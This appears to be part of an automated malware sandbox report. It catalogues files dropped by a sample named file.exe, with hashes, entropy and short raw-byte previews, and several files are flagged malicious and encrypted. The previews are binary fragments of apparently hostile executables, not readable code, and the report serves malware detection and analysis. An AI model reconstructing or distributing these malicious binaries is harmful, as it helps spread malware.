                                            SHA-512:632BA57B60BB60399CE59D8B5CE46549C79216ABA9FCA9B951366234AE809C3090F31C23755B8B41E98851F88DDD59E9306B09C4B501F9252641F5BDA1E332D6
                                            Malicious:false
                                            Preview:y..3.PeekMessageW....TranslateMessage....DispatchMessageW....LockWindowUpdate..].GetMessageW...BlockInput..&.OpenClipboard...IsClipboardFormatAvailable....GetClipboardData..I.CloseClipboard..V.CountClipboardFormats...EmptyClipboard....SetClipboardData....SetRect...AdjustWindowRectEx..T.CopyImage...SetWindowPos....GetCursorInfo.V.RegisterHotKey..G.ClientToScreen..A.GetKeyboardLayoutNameW....IsCharAlphaW....IsCharAlphaNumericW...IsCharLowerW....IsCharUpperW..X.GetMenuStringW..z.GetSubMenu....GetCaretPos...IsZoomed....MonitorFromPoint.._.GetMonitorInfoW...SetWindowLongW....SetLayeredWindowAttributes....FlashWindow...GetClassLongW...TranslateAcceleratorW...IsDialogMessageW..{.GetSysColor...InflateRect...DrawFocusRect...DrawTextW...FrameRect...DrawFrameControl....FillRect..@.PtInRect....DestroyAcceleratorTable.X.CreateAcceleratorTableW...SetCursor...GetWindowDC.~.GetSystemMetrics....GetActiveWindow.1.CharNextW.3.wsprintfW.J.RedrawWindow....DrawMenuBar...DestroyMenu...SetMenu...GetWindowText
                                            Process:C:\Users\user\Desktop\file.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):21504
                                            Entropy (8bit):6.6424670756329
                                            Encrypted:false
                                            SSDEEP:384:0cgT2k9eZM0/1zbE1PJcF8ufnpZ9aBXYrxzDZJgs/ZN/EyFpdf:EF9OR7F8ufnz4kVDZxj/z
                                            MD5:1913A68E92C714BEB7BE51AFE0181551
                                            SHA1:F70635B43C6DA3A1FE1035BC7E8DE3F31CBDBFA4
                                            SHA-256:29FCD2B344F47F918B77848BA0060E479DF490098F6176DED49A963D6993A831
                                            SHA-512:830A6379726DF38D974E6D7BF005C683DE903D8454037EA417B79E144347CA635B0C66C97D20E409AA49C15A8BB4B8D128EE9CFD66DC174683993A2F44E11BB9
                                            Malicious:false
                                            Preview:..D$.^_..$....W...................te..$.....f.o.f.oN.f.oV f.o^0f...f..O.f..W f.._0f.of@f.onPf.ov`f.o~pf..g@f..oPf..w`f...p............Ju...tO.......t.......f.o.f....v....Ju...t*.....t......v....Iu....t.....FGIu.......X^_..$.............+.+.Q.....t.....FGIu....t......v....Hu.Y.....U..U.. .K...M.#.#M.... .K.]... ....t.j...!..Y.. .K..t!j.../....t.j.Y.)j.h...@j.........j......U..E...AL.].U..E....>I....A....A..]...U..V.u...f.....>I..F.........^]......>I.....U..VW.}...;.t.........t..w....5......G..F._..^]...U..V.....>I..R....E..t.V.....Y..^]...U..}..S..t-W.u.......x.W.....C.YY..t..u.WP.M.......C.._[]...V..~..t..v.....Y.f...F..^.A...u...>I..U... VWj.Y..>I..}..u..}...t....t......Q...p..P .}..u...t....t..E..@...E.P.u..u..u...@.I._^..]...Q.. ?I..g...Y.U..V........E..t.V.....Y..^]...U..%.AL.....S3.C..$.K.j..!-......L...3...AL.3...V.5$.K.W.}......_..O..W..E.M..E..ineI.E.5ntel.5$.K...E.5Genu....j...X..j.Y....._..O..W..M.M.tC.E.%.?..=....t#=`...t.=p...t.=P...t.=`...
                                            Process:C:\Users\user\Desktop\file.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):116
                                            Entropy (8bit):3.734931856152107
                                            Encrypted:false
                                            SSDEEP:3:qlGNAWGXWUqt/vllpfrYZcFTSn:qlGNqqjvVS
                                            MD5:2C945420550DD733DA1CBEB5B916BDAB
                                            SHA1:DE7494411ED73CF0EF4E2903C83D4B92B77844DF
                                            SHA-256:26644B77E9285FC0A576CF201E463C9D250B661684CF22181FFBFC184B07E600
                                            SHA-512:D6A480D2254ED021161E9C7CEE50BC3C027965BCC84CB4F22E70C07D2ED30CC8B94E07832A3A9E155943D5F0E9F56AFAFAD6A1354C38DF26014A34E583095C1D
                                            Malicious:false
                                            Preview:IndieBeachesHonIo..MZ......................@...............................................!..L.!This program cannot
                                            Process:C:\Users\user\Desktop\file.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):64512
                                            Entropy (8bit):6.51096578838961
                                            Encrypted:false
                                            SSDEEP:768:JCVKSb279sAOOWNMZmwfHh17McqQHEdQ7iwDIUKo+jBAfe6TtgguvkFec+jJ5PZY:sKS+9sAO+kdIlDbKffUCJ5h3Fsoe1
                                            MD5:BF8E0B3D851E05FEF6EA842DCC841C72
                                            SHA1:A8D5EC0871E37297B0E1E0D5C259002D9AD45FAD
                                            SHA-256:C2DB74B48A22B63342927538CB385BBA0F118AD2079F0AB97DD080A0FA0E18D2
                                            SHA-512:F78E3CF5954BCE9000EC94F6B109BA67A4C0949540888A8ECAB3F5E0719F9D70FF54CF3B06A3E80694CC15988712392CCD5FDCF989FD984FF4F647D0022616FA
                                            Malicious:false
                                            Preview:t$4.*...D$.P.L$$.....Q.D$$P...H....f....L$ ......L$...X.....D$0.t...j.j..H....%8.._^3.[..]...U..E.Vj...@..0.E.P.L5....t!.......E.......@..0....I.....E....E...u..M......3.^]...U.......VW...L$...L...E..@..0........F....u......t..L$.QP.)......j.j..H.......M..D$.P.....L$..<W.._3.^..]...U..QSV.u.W...F....x..u{j8.tI..Y..t....Ix......3.~....@..r..F..H..a..........#..F..0...X...........W.v..Wx....uC..t.Q....y...u..........F......^j.P.E.P..4....t.......E.......X....u...u......v....E..F......>.@....x..u....g|....t.Q...x.._^3.[..]...U....SVW.}...G..0......V....E..B..E.B..E..B..E.......v..G..H..e......u..U.....:...U.....B..<.u..M..E.P.M....'.G..0...:....v..M..4.....j.j..H.........M..U.._^3.[..]...U..E.SVW.@.3.S...0.E.P..2....t/.......E..u........@..x..X..T....F......>.^.. ..3.SGW.H.......u....+....~..._^3.[]...U....SVW.}...G..0...z....V....E..B..E.B..E..B..E.......v..G..H..A......u..U....9...U........t..E.P....j.j..H.........G..0........v..M.......M..zT.._^3.[..]...U.
                                            Process:C:\Users\user\Desktop\file.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):6144
                                            Entropy (8bit):7.949317212073021
                                            Encrypted:false
                                            SSDEEP:96:brMS4pyEE2ZGhPqHpwACnMRj0PN1j1N+F5YknLe2OiqqaiEtBHmhyG57P+sz99Na:nMtpyLizHpkmjov1N+F53LeEqliEihyR
                                            MD5:8D21C3EA1B0ABA73ADC96A2D27387006
                                            SHA1:2F72F5E84BBB06FB46DBF3112F460B323FC53C39
                                            SHA-256:71BC9ABD9429B631A2CC6274163C6FB74CE5F1B63ED31BF490610CD6B89096EB
                                            SHA-512:558F978562C791374FF6EE6E97FAB6D2256E3A9AD404A7B976923AC5A06C98A269DD056A8E501E2874BA1398DFE266B1A8B8F4B5DF04138AFF8EC021BAB0997D
                                            Malicious:false
                                            Preview:.D.-.hB#)IFUy.|.D....i.....-.?.&.B..u....7......V..9.Ia..0;}.{v..n..333(.Kh.Z.Z....C...BX....y........4fgg..bz......`...2.+.....Q\..k..=W`....T,b6?.Z..).t.....-a.j#/j..\H;j.UmaN....fhk.XD...{......Rb...&.W[G..........3....$2.;..-.nM4....D s.P3....;..6...(e..oE.J.b.....$?%..K.UA..\....x..NI...m..K..E.^.7...a.!....a.Z..F;..z.....Q. ..>,.G.As...E.[.m;....&.......f...R.)..^.%h&....?.....Y...r..f..b.9.>).$..(.\...?....R.{...O>.M.]....\..!...D.........>..'.k....y..E4y.r7xj..\..C... .5..l.oA."0..5.ty.y..... ...c+``M&m".......).;>@......Q.J....g...u..C.L#.j".-.1sC.L-.B..s.vC.."........@.T..........#G.....l...Lc...>)..Rh.Z..d..ut..0.+.........B.....`]m..l7.,.... .S=.h...\.E....?z?V.w.........V*6.'P..9..$<...f.%/?K.M.....:..:...x.k.x'.{......8B.....f2.X..W......p..A....Jet:F.../.&...a.Nd....w>.......P.~".Q..Q......_?~/....5..\..:l.S.[........B/..!).'q.......~u..wH2......P... ..o..\....C.-.$x,..|u.v..N........c.=.L....B.R.|{dd..._.jY4E".a.J.bL..r"";R.3*.
                                            Process:C:\Users\user\Desktop\file.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):52224
                                            Entropy (8bit):6.4863989319677335
                                            Encrypted:false
                                            SSDEEP:1536:DbgjQWq8GV3jOTJh1Xl2ub2tBOjAeKmCa:IjQWbt12uitEfCa
                                            MD5:607C3904C82E7B1C23AF8658A8C36879
                                            SHA1:C07034D3195A5AF40F873543ED364C03E2C6BD8A
                                            SHA-256:37BB7E0721A0F992E2CC008C4BDDDDA9AA73EF2E438E974BB3A33F9015555B04
                                            SHA-512:7274AF382D9750987C66F368DF346B26D8428012CA31D4173D67EBE70073203569C5BB0B8C0A0BB5ECAE3B2ADB42B780308647C520E643A6EF3D2E7AA961AB2A
                                            Malicious:false
                                            Preview: be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...y..U..........".................*.............@.................................w.....@...@.......@.....................L...|....................8..0....0...q...;..............................@X..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...............................@..@.reloc...q...0...r..................@..B.........................................................................................................................................................................................................................................................................................................DQL......h..C.....Y...L..h.C..{...Y..N..h.C..j...Y.h.C..^...Y..<C..
                                            Process:C:\Users\user\Desktop\file.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):183296
                                            Entropy (8bit):7.999075076566574
                                            Encrypted:true
                                            SSDEEP:3072:6n4bAXdCwpO/3cjnBWjcdX3oyGmTUYGLx9tJsiqn3u6iDwqLulIc:623wMUWj0noUoYGTtJsY6IwqLmt
                                            MD5:8CFC772B95154EB054B7CBDE050D920A
                                            SHA1:0DDE0C723029D96E07D822BE17DD82D3FD9C3E05
                                            SHA-256:4C207BC921E0DF2C5666025F1C68495A83730E6BF87162BF970CF87654F34E73
                                            SHA-512:3968EEECFB07D2346BDFAE0CE85EA36DE6B0D48D3D6A156DA99F0E7ED0BAFC3069F0D99AC85744DB6DA11E3CB5E3041B9714D8F6A5AABC7DC2B2A231CDEE68FF
                                            Malicious:true
                                            Preview:....~....u.,F......j.. ....B4q.......b^..{.o..C..f.>....j.+....Y@.Q.oQN..mp..x....:#.,.4.#.7..`..z.|+...3.8...AK.=q.5y.j.\..YV..D5v.:.m."....+y].........:..`....J.cOC.'.n.0..f...mK....h.....?..df..J....U..}..W.zl......1.3..?X....g?;.Y......%..fa~o.S..d..%.....);0.Z.7.}}.P..(`.lE7...dr.M.]..G.#...g..8<...>[.[.......eR./..om..L.1ef..>.D4.......).L... .....v..*.J .l...W.T.I..R.&..U...Vg.c"&.o.P..Rr....u.+.~.e..c.E....x.&^h.....-......;..g....Ze....+t*N@..|.Oc\..V...W_.B..A.U.....?.z.vy.h.q?..|....h ..,.jm<...w.R..."R...E.....<.........e......)..t.c.QwmT....Q..!...3rE.V.z...?0.rmK.*.FN[.x......i\/.....wtIc.]....p....X~f.. '2.z...?.#.j..:..Z....X=4.Ela.W(.WM...T....l.0.B....Ee.EE.......#5F..D!..~.u....Lb...;.F....H.5.d.e...#|..|....~'.m...7.SD..H..~..}G...k(..Q&..G.#".{se.~...~.)7I./7u..F..5w.,&..9.....y.z...T3...ok..]..../U.R..WE.e.D...eKp..r..N....e!.H..#)(T..._0|.^TP3.1..9-sC..<..mD.../.<"...b..%.WEZlS..5....%Q|.j...?$.....)...M..R8
                                            Process:C:\Users\user\Desktop\file.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):84992
                                            Entropy (8bit):7.9979204582388554
                                            Encrypted:true
                                            SSDEEP:1536:XNQfGZCctJRGaHojcxXuch1kmlVbj75pC5fNTttGn+xaLag/4SSg9CBAO7BN:XNQfaCnGblVb5pC5FTD1DSiPBN
                                            MD5:811A409C0330A7D3BE0D9A875B11063D
                                            SHA1:2A640DC241AADE79E210FD5F3D78F91EE211D3D9
                                            SHA-256:20A77AEB36059F6D2B678CF960ABB0C769E9DCC224777AF407745623786AF34E
                                            SHA-512:5852F7F8BF504FF9B9782F37171672E31442D2E0D8E31CDEF489198312B701FB57AC5B5A68976B36CF551878551B91EEB9D5CAD72A14E5BE78892DE9A185C39E
                                            Malicious:true
                                            Preview:...+...JPpb.$'..c.x.......K...rX+..O.{.].1K...O.wb.Q.Pz.E....Fa...A..l...Z...&..-?h}I.^.."...q.......gd?...i..B...E.rW..Q.?Q/.k.!.....J.$i.}..ed.?...S..o..#.`.....dE+...f.....m.n...&...b..K.(*w1.&.'..y.....Hy./9x....A..J.....w...r.k..W.......P.g5NP.Isn..n^...n}......Z..c....5..Q..Dy._r+..z..$t.sNJ...v..w.g...'.q.r..m>..t..=.i.Z....>.H.....J.M.Q.ZY=.J2.."[...*.(6../.7.[V^..q5..3......h..(X.d.=..j6......k.V....7..T...f).6.6.Nk..=..{'.Y......E....>~....$.W..]@..).{;.@....S..,.}ZP/4J:.&E./=T.O/..8!.t?/c.....Qz....W.ERhf....`.b2M.,#a..N.M~.`..u...bt..W..7A{.xr...[...S..&........)..m.:.>-`G'.`.(.\.=.....Y.....i]1.s.z....E...D.N..|K....{..f....-\..n..;...U.0.,u.....F..p..:?:.O..&..........v..S..0..[..cX...N..x+bD[.....g..|Rv>......3....;....Bk.@v.8.....c...`..VF$Q......'..E.....C.W.s,..J..|5..Q.B...L....X...Z.....\..xh..Pv.>)....n.&{s....w....y.....0.c..E......wT.!.......O..H....K...t|.OW.....F..&...r..C.V".....C]...z..L..l=:.....wX[~
                                            Process:C:\Users\user\Desktop\file.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):65536
                                            Entropy (8bit):6.7074396642151095
                                            Encrypted:false
                                            SSDEEP:1536:+hrNCsGJh5yA05E22VelTXzSj9xb7XDh1RlyxcZqvinN8Psp:UlAYrlTGj91DhrlyU8Psp
                                            MD5:EF5D0F587FDA43EB514F8BABD4D15169
                                            SHA1:32571BDFC0455C7546C15EBAA15A356261608C14
                                            SHA-256:6F1377F3B21DEEB200AA841CE0989C3906806FEF7FA259551E266ADDF2BB4F1B
                                            SHA-512:27B3C447105042A882F30AE1740878E75192C6745F7EA8532EE33D5014B61038C782A98F9D9DE99B2BF8D4CB7D648ED69BC5E0F8E6DDF209E39B6A3EB85D82CD
                                            Malicious:false
                                            Preview:Y%...&...........&...FD......;%...n&..........*%...FD.......%...P&..........D&...FD.......$...2&...........$...FD.......$....&..;~|...&...~.....&...~.....%....F4;....%...Fh.............s.....%......o....U.;U....$...N|;........E...uT.V...t.j..F.PQ..............S$...,.V....+.;.w f..f;F4u......3$..f.G.f;F6..%$...E.U....................$...D..............;~|.......~.........~..........F4;........Fh........................w4t......t....A.......#...2;~|..]...f.?...S.......K.........t............g#...~l...]#...%.........w<..J#........w...<#.......3#.... ..*#................#........._ ..w/...#..... ........... ....."..../ .....".........0....."............w<............w...}........t..... ..."...f............"...U....._ ..w/..G...... ....n"..... ..../...../ ....V"..........0....E".............w...2"................ ".........( ..........) .....".............w........A.......!..................!...................FD.......!...}.........!...FD.......!...b......wZ.FD.......!...K........r
                                            Process:C:\Users\user\Desktop\file.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):5120
                                            Entropy (8bit):6.384020949103289
                                            Encrypted:false
                                            SSDEEP:48:/AIpWg0ePfzMINl36LKuPzZiQYFgBAmFmL+MPlVhKLyvq5UsNhRRiG+Ed01Tb/Kn:/AIpWgLDlK+QOGmLvjKLjvrMWuSn
                                            MD5:04FB74262BA54E88BB3840683EA42B4B
                                            SHA1:E6E10DE4005C0E849A2A6D453EF924ED5329D6F9
                                            SHA-256:61EE1B23621D1BC7735FBFCAED30513572B7BE9FB4ACB2C58B457A58C84FDFE3
                                            SHA-512:9BC1FCA8E1044A41AD46EFD69B576A75ACA2D1BCB9584F9D86FC1E3CF5C27DDD996ABDA7BE53CDF4E4AC029B46DCB8BA25B58BE6F75B36EB9A9D8A908E4B1EE0
                                            Malicious:false
                                            Preview:.......O....E..A..E.A..E..A..M..E........3.......WWWWWh....P.u.....I..M...t.......P......h..I.......Wj..H....B....M...k..V....I._^3.[..]...U.......i..SVWj.......I....E..@..8........O....E.A..E..A..E.A..M.E....J...3..E.WWWWPh..........P.u.....I...t(.u.......h..K.P....M..........P........M.h..I........Wj..H....r....M...k..V....I._^3.[..]...U...$SVWj..M.....I..]...h..I.......}.3.@.E.9G.v..G..H..-....E....|....~.3.@.E..G..8........O.h.K....E.A..E..A..E.A..M.E.....g...}..O.........t&h..K..M..f...G..8.......w..M..ee...!.M.......E.P.M..Oe..hL,I..M..`...E.3.G;.u_.u.....I.;...-...HHt@Ht3Ht&Ht...Ht.h..K......ht.K......hh.K......hX.K......hL.K......h8.K.........u4.M......=.@..u..M....=.@................h..K...............M.U..m............E...........$...F.h..K..gh..K..`h..K..Yh..K..Rh..K..Kh.K..Dh.K..=h.K..6h.K../h.K..(h..K..!h..K...h..K...h..K...h .K...h0.K.........U.j.W...H.... ....M..h...M..h..V....I._^3.[..].....o.F.v.F.}.F...F...F...F...F...F...F...F...F..
                                            Process:C:\Users\user\Desktop\file.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):50176
                                            Entropy (8bit):7.996212600007831
                                            Encrypted:true
                                            SSDEEP:768:7JcWhMk7BOO8ar14ic9pB61Ojk76FVcxja/ezOKLsSMjgHn6Ri6WqVZL5:1DZ58ar14hpB4cYNjEezjMjtpZ1
                                            MD5:EEA1443F1AD775ED4990D11CE441C1CB
                                            SHA1:64E5FA0D813BFA915ACBD173293B905462555982
                                            SHA-256:8DD12A82DB96E3ECD8D4E85386CB19493BE3C8AC923FF2D144EF9E73FE7CA63D
                                            SHA-512:E84C3C39333F02C35970CCD2B954CE305E2574E98E290AF350A45E4CA59CBBC294E6F640DB656A0AADA5058BCF9977B45E63D11414999CE1F50405D359A62712
                                            Malicious:true
                                            Preview:.S....j..Z....E....dB...7..PP.....u....g...-.E..z.......2x :.8.,....U.3.&U...=|.,dFP.(..3.g.[W.*EH....c.%J......*L.'.......$Z...#P*j.=F.4..H...!D.......31..>_.i.f.=A).k1..a...'}.8M..R.R..J..rX(.].........;....G6`....lE..).Z.[.[K.q~....a>.5..X..F{............j..z...I...'..".....X.y....L.Q....Q.M.R...O.zt.s....\1...&..>K...:..dS..h.w......P....W}o.j..e.3OBu.#fU.....J...S.Ya.U....(l.oz......o.D.ks.?...j....WR%3.bn.`..1..D.....Gf..1Q(..I..\.g..S.Ek..;.8y.<..a._.`..Vw)\...T.;.m...:.?.h.......0.%.^.x...s.V*;.5g#.......p]..j.v...d.r.5.A........zx.+..h!...6..d.[..F....D..I4./....}"......*....D.14_Bk..l.JS.s.k...c../..d.O..n.S.g....m.=.1o,.^.......\..I........XS=,Fs......E....A.........C!.4v..q..C....$g..8....a.......y0..8JL|.m{.l..kn#%=...9Or{08Q0k./q..y..w..L...........k||`9...5........`u,8.lE....\......8.j.\O.j...p.W..%.j..aS...j.n..b=r3..G....=^.....vMh3....2s..2]A.V.e=..8..s..ul.....qS..RWO...:Z...t=UY..nd...%'.U..<).R..2l..h........
                                            Process:C:\Users\user\Desktop\file.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):112640
                                            Entropy (8bit):7.998333373356418
                                            Encrypted:true
                                            SSDEEP:1536:KsIohecAshkIib9vqcUU4hqHKzevahi/TQwFGBaIKL9Bu41wn13y/t98:5IonYI2FnoDzsmidFOYwcww/tK
                                            MD5:4E9081732E202A22ACD90381851D9893
                                            SHA1:F6642F946022D285D00A060884DF82C0D7311826
                                            SHA-256:2141F590F3B3997D77957E11EA595342D3B0B4389C3908F5C6EC895C71D29BBA
                                            SHA-512:04DFA8270D99F40B6F0E77249CB01C20A8055752C6CFFF92B917DF57BB45F93897BE3581F5EA449C0112A36EB28B029C0FDBF1D5387BE35B824F904B2115B99E
                                            Malicious:true
                                            Preview:.S....Ms...s.I...z.i.~.....+...X.7#..U.8.........`..[.. .|....ZR@fg..S}.C.H..=..d...5.>..c..d.O..*a...Al9........`#q.........../..C.w..US.K._X.......j....!;....~9..7kW....2\....rQ."YsR.[......|......./#"&...!....z..D.s...ho7.i:.:K..D...9q.F].s.j.0.M.4]...._.J.?*.x..-xw.!......:...,....8...`.b..D..[...T.taneG"N...b..o.0..\4..J...Z. ....T...7Y..:.....:.3.....a.$.....R.e...O2sh.b:.s...~.^.9.vO.....HyHK1..eS.T..X.....$V.{.p}.tM.k}..SgO.......XV..d ..._j.....(..4... C..$.j....G...Q.6`..o)......uO......p6.v..`}@_.6..5........8.....Nh..%).Yo9...M.\k..r.k......,..b...e..g..?.~..q-.+.3..C....%h}Z....E":..c...B..%..A.AH]....,.".A;.T..._.....C...3.F.3N4.r.4.r.._.....=(..K..x.Q>...=}J|.]..]XS..Y.|..+Ak2~+]5..IU!.k.7=+...'.b.....P.....].Q..r..=8a..........mN..Z..{X.W/{].b.RX.T....#J..EN..x.3@].....\....a..8......:.J.....a.B..i..r.....+.D.b*.'....A]Jk.&.Ft..A..p.......u..."/k.8.....f.....)M..|mx..[.W#..J8.3..;OU..#0."o..MbtL.0g..?(.[#.3r........)...o......
                                            Process:C:\Users\user\Desktop\file.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):177152
                                            Entropy (8bit):7.998915606396731
                                            Encrypted:true
                                            SSDEEP:3072:Lp9ECwwQ5Scftgx1UptEL6x/J4CFdREwiaUlwH6urzqjmSbXwD+xI7pZi/aiOQyd:F9ECYQcfGxdL2hvBLib+jP2mx+xIVZiQ
                                            MD5:E9FCB097F449D3B71F42E4E586902779
                                            SHA1:F27392A528F3CAA678740341C86081F503635279
                                            SHA-256:985BD2B13C45EDAC103450C77BCF1B6A1681E05B85D659B018D94C3CD1D39406
                                            SHA-512:3B0C88D55E7584B64B113A8AB41D97B300384D97C6625B206CAF1223676CE573E6360B00452BD3C048735EABF6CDDEAD6CA23EC4FD50F89F1517C00C26DF735C
                                            Malicious:true
                                            Preview:A.>..8..5.;.S....h^."..zL.rV...,......2..zZ..j.:+.m....Ue..cZ...Y.W.w.).R......V*.I. K......o...@"......;....B....qty\tc........z..D-......-..:.v@.<....L>.Z.K.....a...P.L...).CT}..Dy.s,E.....('c.....3.1.1D .-....5...._QYL%.p...).f$0,...`..;.N5.........cd..L...M..`^\..D.%..Be.u.8..dXC.....r......H...IQv$..-Y....Na+.f..9..r....M..>..jxm....%w...J.e....}N.o....,S..T.A.[W.0..B.}....a7.v.=..s VJ..F.,.y...,.....0.....0..k...kF..k..q.... .#C.~.>[\/......^Q..../0......u.1H%.F..b.U.......IR.,,.......3b?...........O.....=.{tuI8....e..o....l./&.............V.....e5s..X.9..->...P...q...X..a..=.`eq@(..]..I.\.$...DI../.......#h_y.Y.Y....?..o.h.......7|..........K..dP...B..... ...'Qa..I...qh...|..h ....s.k.C[.+B..c..25._......SG.N5...i.P.M...G........Z-%...._}....t....aw.b...'....y.K.....t. .l.qC...'...T`I........=s...FZ|N..W....798!./..d.J...sI.S~..O.e..~&..d....vJYoZTi~5K..#....#VQ...!5%:........Zu......g.|.u;z...{b...,...F.uIbg`.3V +...r.-.(....m
                                            Process:C:\Users\user\Desktop\file.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):34816
                                            Entropy (8bit):7.994699151513296
                                            Encrypted:true
                                            SSDEEP:768:SyEpuCH3rhBRYkeGk1eQAIgIe3KSMZGmMET6Gd2kg+x:vEpuCXVMkeGWeQAIBeKSMAWzg+x
                                            MD5:BB5E95A0788AB31A449E282507BC4A5B
                                            SHA1:5D0E01D3D9512DD9BEEE9B49EE3A8025107282AC
                                            SHA-256:25C7555CBD64F1C8272E2F8DF17243B60AEEB96E0B3A574D8CF78BA393CE0B88
                                            SHA-512:7D99BB9950F9B5B87D140C98EF6F81FA285F898325C14D296CD929126D327A6D2D3EDFF7BC034C265317B5BBB9BB54AEF51CE94DDD6E45F6A425A0FF5A8F74F6
                                            Malicious:true
                                            Preview:e..F&qS...5.]......1...h...o.*.T.5...Q.........$c.T?n.<...`-........(.kpr..2+)...'...L.i.;.+..#`$?...j..`....|^I..2[..F...6L.b#....$..}bQPY).#...=..=.JQ..`...m..<........d9...[|/q...q<...X.W..T......c.O.[....FG...~...........d.uI7C.tX...Q.0...m....-..4.........GsB|6U`1.#.6Zk...C.YN.kA;.G.`.U.....j.._....qh_..S...(~.m,K..6.....u....M.F.R.B..x..#3.....*v....,`.r..[.........).+./.......I.`..O.....3.......>....@R..,......uI#T}n>..t.e.kT.w....L..DL....MR...{..u.3.5.N}.#q.S.d..9r.P2...T..s...%j.y....f..[.,.W.1.)`.,%...K.[...-\....f......B..{.1.?.5....^....P.GK...7d.&...!.9R(.P...O'....i/`@.n,.hX.fh..S.;V..{8..Z/s.....,x........`F.&P .8O7.[_........ .d..D.g./....U..i..[..l.".r..m.... .#....d....?]~....vJA_.....3.p........N.q..i.d..9:.`...@....7....6..5...ql.K...1}..9.R%.5.......i.......Qj.I......i..x.r.<.<.....#.."..f.s..pQa ./.......0....{..d&.(=...Bm..3?(.._.].H..n{......#.g..QV.k.vQ].~.....qV.*..f..$..A!OG..f.@&..9.....6O..#n~.|.Qt&....
                                            Process:C:\Users\user\Desktop\file.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):55296
                                            Entropy (8bit):6.101388703970886
                                            Encrypted:false
                                            SSDEEP:1536:aIKQ8SoXTqgWVrZ+Int3SdFc9vtmgMbFuyO1MBNX:HXwT5MAg0FuyOKBNX
                                            MD5:5E231CB9FF4A4F93067AF99469B172BF
                                            SHA1:89D5C83F6FAD26F0AB5041FB294AAB23CE0AE40A
                                            SHA-256:568F7EA9DF5107ADD4311E4852455D9B8DF3D6461BD49634519E30564B87D14A
                                            SHA-512:AD5827ADD37168A53B95DED664443ABFCFE21D5887DC1F09D4E8634F904BB75DC09EFACCA9F2A4F51152F48435E9453A12656849B77DD5123E6CE0381AAEF849
                                            Malicious:false
                                            Preview:D$ .L$$h....P.F.PQ.t$.....I..t$...G..YWS......u .E..u............Qh.....u.....I._^[..]...U..QQSVW.}...gL.W....a.....hL......9}.u23.9............E.P....I.VW.u..u.V..........I......u....`...E....tR..$hL...............t<...t7...t2...t-3.9p.t&.E.P....I..$hL..M.V.3.u.....u.V...p..E....E.........Q.u.j{W....I._^[..]...U..SVW.u...gL....-`.....hL..u.....>...uC.v....._.......tA..$hL.....1V......F..t.j.Wh.....3....I............V.v.j+.u.....I._^[]...U......\...SVW.u...gL.._...u..D$..D$HPV....I..t$L.D$..t$LP......T$.....hL.......D$8..........$hL......................L$PQ.L$D.D$.Qh....3.P.|$$....I.WWj.V....I..D$D........H.D$<h.....D$\PWV....I.;|$<}+.$hL..............D$Xu.h..K...h..K.P..c..YY.D$XPj.h.....t$.....I..D$.P.D$XPh.....t$.....I..t$..t$.h.....t$.....I.G;|$D..l....t$..t$Dh.....t$.....I.V....I.3..L$.3.F.|$..|$ .t$$.....h..K..L$,.t$(.\$...N..3.D$.C.prL.SP.D$0..P..r...L$(..P...L$......L$...L$(h..K..\$(.<N..S.D$...P.D$0P.r...L$(.P...D$XP.L$..u...h,.K..L$,..N..S.D$...P.D$0P.`r...L$(.j
                                            Process:C:\Users\user\Desktop\file.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):41984
                                            Entropy (8bit):7.449207061563899
                                            Encrypted:false
                                            SSDEEP:768:Mrafd0maNBZikj0kkuhsRqI5o+oyyxVxCaw2F8aP6VOHQznzp8G7bJu1UY3dLi2n:MraF0Hikj06LDykFIcizp97bA3EKNcO
                                            MD5:5B831D959D2BAE2A472BEEC42C76FBFA
                                            SHA1:34506C2726108509B45A1E5F4029AC5B009B0BEF
                                            SHA-256:AB6208142AF3D520951D8159588B46642E982D4BEABF78DC833A1EB1C0039452
                                            SHA-512:B0BA1E6C4460DC75C0F7A1C435B6453BEA2E755327FB1770B6BAF4F9AE1498E8DDB2099801C1630318AFD50C738506C747E052A75952E6ADF335A354C9AA337F
                                            Malicious:false
